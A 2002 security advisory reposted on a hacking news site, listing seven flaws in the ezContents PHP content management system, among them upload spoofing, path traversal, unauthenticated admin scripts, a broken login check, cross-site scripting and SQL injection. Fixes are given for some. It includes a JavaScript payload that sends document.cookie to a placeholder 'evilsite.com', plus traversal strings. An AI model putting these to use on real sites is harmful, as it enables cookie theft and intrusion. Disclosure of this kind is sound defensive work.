Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » ezContents multiple vulnerabilities

ezContents multiple vulnerabilities

by Nikola Strahija on July 26th, 2002 "ezContents is a Web site content management system based on PHP and MySQL. Features include maintaining menus and sub-menus, adding authors that can write contents, permissions, work flow, and simple settings to customise layout and the look of the site. It is possible to integrate external scripts, and frames as well frameless Web site designs are supported."


(direct quote from the program's project page at Freshmeat)

According to the downloaded package, ezContents is released under the
terms of the GNU General Public License. According to the program's
homepage, it is released under the GNU General Public License with
some additional clauses, one which states that you have to ask
permission before using the program commercially. (Does the GPL
really allow you to add additional clauses?)


SECURITY HOLES:

1) The image file upload function allows uploads to occur, without
checking if the four global variables with information about an
upload (file, file_name, file_size and file_type) really were set
by uploading a file or if they were normal POST data. This means
that it can be fooled into treating any file that the web server
can read (like /etc/passwd) as the uploaded file.

You fix this by using PHP's is_uploaded_file() function, which
checks if a real upload has taken place.

This issue was corrected in ezContents 1.41.

2) Maintain Images:Add New:Create Subdirectory can create directories
outside of the ezContents directory, by using directory names like
"../../../../../../../tmp/hellothere".

3) The administrative scripts createdir.php, removedir.php and
uploadfile.php don't check if you're logged in or not. This means
that an attacker can create/remove directories and upload files to
the server by POSTing data to the right script with no need for a
username or a password.

4) Maintain Images' file listing can be fooled into listing
directories outside of the ezContents directory, if you use directory
names like "../../../../../usr/bin". It only lists certain types
of files, though.

5) The VerifyLogin() function redirects the web browser, if the
login fails. It doesn't stop the program's execution. This means
that the script still runs, just that you don't see it. Equipped
with this knowledge, an attacker without a username can edit lots of
different information by simply POSTing data to the right script, and
view lots of different information equipped with a tool like netcat.

6) ezContents has got some Cross-Site Scripting issues, in the
diary and other places. One user can enter some JavaScript code,
which will be executed when another user looks at that entry. This
can be used for stealing someone's cookies:

self.location.href="http://evilsite.com/evil?"+
escape(document.cookie)

You fix this with the htmlspecialchars() function.

7) Finally, there are some SQL Injection issues. They are of the
simple type where you don't really have to inject anything, because
the programmer didn't put apostrophes around the input variables
in the SQL statements.



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »